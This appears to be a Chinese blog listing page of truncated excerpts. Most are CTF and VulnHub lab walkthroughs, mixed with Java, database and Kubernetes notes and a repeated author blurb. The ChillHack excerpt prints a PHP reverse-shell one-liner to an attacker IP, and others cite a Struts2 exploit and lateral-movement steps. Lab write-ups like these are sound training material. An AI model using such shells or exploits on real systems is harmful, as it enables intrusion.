一、介绍运行环境：Virtualbox攻击机：kali（10.0.2.15）靶机：FunBox4（10.0.2.29）目标：获取靶机root权限和flag靶机下载地址：https://download.vulnhub.com

一、介绍运行环境：Virtualbox攻击机：kali（10.0.2.15）靶机：FunBox5（10.0.2.30）目标：获取靶机root权限和flag靶机下载地址：https://www.vulnhub.com

CTF密码学-编码基础知识点总结0x01目录常见编码:1.ASCII编码2.Base64/32/16编码3.shellcode编码4.Quoted-printable编码5.XXencode编码6.UUencode

很高兴你能来阅读我，我会陆续更新Java后端、前端、数据库、项目案例等相关知识点总结，还为大家分享优质的实战项目，本人在Java项目开发领域有多年的经验，陆续会更新更多优质的Java实战项目，希望你能有所收获

很高兴你能来阅读我，我会陆续更新Java后端、前端、数据库、项目案例等相关知识点总结，还为大家分享优质的实战项目，本人在Java项目开发领域有多年的经验，陆续会更新更多优质的Java实战项目，希望你能有所收获

很高兴你能来阅读我，我会陆续更新Java后端、前端、数据库、项目案例等相关知识点总结，还为大家分享优质的实战项目，本人在Java项目开发领域有多年的经验，陆续会更新更多优质的Java实战项目，希望你能有所收获

很高兴你能来阅读我，我会陆续更新Java后端、前端、数据库、项目案例等相关知识点总结，还为大家分享优质的实战项目，本人在Java项目开发领域有多年的经验，陆续会更新更多优质的Java实战项目，希望你能有所收获

RunTime参考：https://www.jianshu.com/p/6ebda3cd8052RunLoop参考：https://www.jianshu.com/p/de752066d0ad什么是Block，Block的本质是什么？block本质上也是一个OC对象，它内部也有个isa指针block是封装了函数调用以及函数调用环境的OC对象block是封装函数及其上下文的OC对象intage=10

DarkHole-2一、实验环境二、开始渗透1.搜集信息2.git文件泄露3.SQL注入4.提权三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机

实验设备：Windowsserver2008kali1.vmware--上面菜单栏--虚拟机--设置--网络--NAT模式确定靶机与攻击机的连通性（互相能ping通）靶机查看arp表（arp-a）查看攻击机

任务环境说明：服务器场景：PYsystem003服务器场景操作系统：未知（关闭链接）服务器用户名:未知密码：未知1.通过浏览器访问http://靶机服务器IP/1，对该页面进行渗透测试,找到flag格式

JDBC知识点总结篇JDBC接口JavaDataBaseConnectivityJava数据库连接，由官方定义的一套操作所有关系型数据库的规则，即接口，各个数据库厂商实现该套接口代码//本代码只提供一个样例

1.MYSQL数据库由服务器端和客户端(C/S)组成。服务器中主要存储数据文件和服务程序。2.要访问数据库服务器，必须通过客户端SQL:StructuralQueryLanquage结构化的查询语言，以mysql数据库作为载体3.客户端可以分为两大类:命令行(cmd)，可视化工具(workbench、navicat、SQLyog)。Mysql的核心是存储引擎，常用的有lnnoDB(事务性数据的首选

本文章向大家介绍怎样学习编程，才能快速从0基础，变成编程大师，主要包括骨灰级程序员告诉你，怎样学习编程，才能快速从0基础，变成编程大师使用实例、应用技巧、基本知识点总结和需要注意事项，具有一定的参考价值

很高兴你能来阅读我，我会陆续更新Java后端、前端、数据库、项目案例等相关知识点总结，还为大家分享优质的实战项目，本人在Java项目开发领域有多年的经验，陆续会更新更多优质的Java实战项目，希望你能有所收获

很高兴你能来阅读我，我会陆续更新Java后端、前端、数据库、项目案例等相关知识点总结，还为大家分享优质的实战项目，本人在Java项目开发领域有多年的经验，陆续会更新更多优质的Java实战项目，希望你能有所收获

很高兴你能来阅读我，我会陆续更新Java后端、前端、数据库、项目案例等相关知识点总结，还为大家分享优质的实战项目，本人在Java项目开发领域有多年的经验，陆续会更新更多优质的Java实战项目，希望你能有所收获

很高兴你能来阅读我，我会陆续更新Java后端、前端、数据库、项目案例等相关知识点总结，还为大家分享优质的实战项目，本人在Java项目开发领域有多年的经验，陆续会更新更多优质的Java实战项目，希望你能有所收获

本文章向大家介绍nvGraph-NVIDIA图形库，主要包括nvGraph-NVIDIA图形库使用实例、应用技巧、基本知识点总结和需要注意事项，具有一定的参考价值，需要的朋友可以参考一下。

C++Primer0x02练习题解更好的阅读体验(实时更新与修正）推荐阅读《C++Primer5th》知识点总结&练习题解2.1节练习2.1.1节练习2.1类型int、long、longlong和short

为什么我们会需要Pod？容器的本质是一种特殊的进程，如果映射到系统中，容器镜像就是这个系统里的“.exe”安装包。那么Kubernetes呢？Kubernetes就是操作系统在一个真正的操作系统里，进程并不是“孤苦伶仃”地独自运行的，而是以进程组的方式，“有原则地”组织在一起。而Kubernetes项目所做的，其实就是将“进程组”的概念映射到了容器技术中，并使其成为了这个云计算“操作系统”里的“一

CVE-2020-1938ApacheTomcat文件包含漏洞复现1环境搭建1.1Vulhub靶机搭建1.1.1环境安装（1）安装docker$curl-fsSLhttps://get.docker.com

MySQL的binlog有有几种录入格式?分别有什么区别?有三种格式,statement,row和mixed.statement模式下,记录单元为语句.即每一个sql造成的影响会记录.由于sql的执行是有上下文的,因此在保存的时候需要保存相关的信息,同时还有一些使用了函数之类的语句无法被记录复制.row级别下,记录单元为每一行的改动,基本是可以全部记下来但是由于很多操作,会导致大量行的改动(比如a

利用sc命令进行横向渗透的大体流程如下：1.与靶机建立ipc连接2.拷贝exe到主机系统

测试靶机为Pikachu漏洞练习平台暴力破解模块下的“token防爆破?”春节期间歇了一阵子，吃睡玩看小说。

>堆：Java堆可以处于物理上不连续的内存空间中，但在逻辑上应该被视为连续的。所有对象实例及数组都应该堆上分配。注意:虽然规范是这样的，由于及时编技术的进步，尤其逃逸分析技术的日渐强大，栈上分配、表量替换。Java堆既可以被实现成固定大小的，也可以是可扩展的，不过当前主流的Java虚拟机都是按照可扩展来实现的（通过参数-Xmx和-Xms设定）。如果在Java堆中没有内存完成实例分配，并且堆也无法再

信息收集先对目标机器进行端口扫描(已知靶机Ip为192.168.43.137)nmap-sS-sV-A-p--T5192.168.43.137扫描只给我们显示一个22的端口，其他信息啥也没有然后通过靶机的给出

VulnHub-LordOfTheRoot:1.0.1靶机地址：https://www.vulnhub.com/entry/lord-of-the-root-101,129/目标：得到root权限&找到

靶机地址：LordOfTheRoot:1.0.1~VulnHub1、LORDOFTHEROOT考察点：1）信息收集：1、nmap挖掘信息。2、端口碰撞。3、信息页面枚举。

补充：vulnhub靶场内核提权通过信息收集获得靶机版本：查找ubuntu14*版本的内核漏洞：使用Exploit：searchsploit39166//在kali本地exploit库搜索locatelinux

靶机地址：https://www.vulnhub.com/entry/lord-of-the-root-101,129/靶机难度：中等（CTF）靶机描述：这是KoocSec为黑客练习准备的另一个Boot2Root

**VulnHub-LordOfTheRoot:1.0.1-Walkthrough**靶机地址：https://www.vulnhub.com/entry/lord-of-the-root-101,129

**基础篇**目标：通关vulnhub平台上的靶机作者：大余时间：2020-01-17请注意：对于所有这些计算机，我已经使用VMware运行下载的计算机。

LordOfTheRoot_1.0.1靶机入侵1、环境搭建下载地址：https://www.vulnhub.com/entry/lord-of-the-root-101,129/下载后用VMware或者

靶机搭建就不说了，之前做过视频现在环境和密码是改好的网络配置Win7：Win2008：Win2K3：IP攻击机（物理机）192.168.55.1Win7内：192.168.52.143/外：192.168.55.128Win2008192.168.52.138Win2K3192.168.52.141

Meow看新手入门连接到HTB的靶机过后，就打开了第一个，好像前面不做也只能打开第一个。

靶机下载地址：链接：https://pan.baidu.com/s/1-tP_hOz4gBkd_CvlvhcfSg?

靶机下载地址：链接：https://pan.baidu.com/s/1YbPuSw_xLdkta10O9e2zGw?

靶机下载地址：链接：https://pan.baidu.com/s/1aZRB-hqvqLlGUmAPFljnIA?

靶机下载地址：链接：https://pan.baidu.com/s/1w2c_QKd_hOoR2AzNrdZjMg?

知识点总结1.函数模板-泛型编程，类型参数化:template,typename和class效果一样1.T是一个通用的数据类型，告诉编译器如果下面紧跟着的函数或者类中出现T，不要报错2.模板的使用1.自动推导类型

来源：TVB第6集情节描述：获得知识点总结：1、案件正式审理之前，检方的证据，证物，需严格保密。

一、介绍运行环境：Virtualbox攻击机：kali（10.0.2.15）靶机：FunBox3（10.0.2.28）目标：获取靶机root权限和flag靶机下载地址：https://download.vulnhub.com

目录周边知识基础指令思维导图权限思维导图周边知识大多数后端操作系统都是Linux操作系统操作系统是管理软件和硬件的软件Linux是一款操作系统Linux分为技术版本和商业版本Linux的文件是以多叉树的形式构建隐藏文件.和...可以表示当前路径。可以形成可执行文件，如./a.out..可以回退到上一个路径路径分隔符/【1】树状结构特点是叶子节点只有一个父节点【2】路径具有唯一性【3】可以用路径来标

下载地址：ChillHack:1~VulnHub主机发现目标176端口扫描服务扫描直接去看web先扫一下有几个有点问题看着好像命令执行看来没错直接反弹shell还有还白名单？bash也不能用那就用php吧whoami|php-r'$sock=fsockopen("192.168.21.131",666);exec("bash&32>&3");'搞定接下来就是提权了有python吧shell弄一下刚

下载地址：BlueSky:1~VulnHub主机发现目标177端口扫描服务扫描漏洞扫描看web就不用我多说了吧默认页面，爆破吧这个也没有扫出来有manger/html但是没有任何返回值应该是限制本地访问或者禁掉了网上直接用struts2-showcase这个洞了cve-2017-5638/exploit/exploit.pyatmaster·jrrdev/cve-2017-5638(github.

下载地址：https://download.vulnhub.com/worstwesternhotel/HotelWW.ova主机发现目标142端口扫描服务版本扫描漏洞扫描看一下web好好好这么玩改host啥也没有先做个目录爆破扫描太慢我就没看了看几个重点的txt（robot,config，readme）（边看边扫）看到密码了（但是被改了，可以用用户去爆破）应该是1080端口登入然后里面有read

渗透测试靶机----SkyTower依旧打开对应靶机，还是登录界面，平平无奇直接kali开扫继续端口信息这里看出22的ssh端口是filtered而3128端口是Squidhttpproxy的代理服务，

JMMJava内存模型规定所有的变量都存储在主内存中，包括实例变量，静态变量，但是不包括局部变量和方法参数。每个线程都有自己的工作内存，线程的工作内存保存了该线程用到的变量和主内存的副本拷贝，线程对变量的操作都在工作内存中进行。线程不能直接读写主内存中的变量。工作内存和主内存Java内存模型规定所有变量都存储在主内存中，线程不能对主内存直接进行操作，只能加载到工作内存中，这样就会造成不可见性.lo

一、介绍运行环境：Virtualbox攻击机：kali（10.0.2.15）靶机：EvilBox-One（10.0.2.25）目标：获取靶机root权限和flag靶机下载地址：https://www.vulnhub.com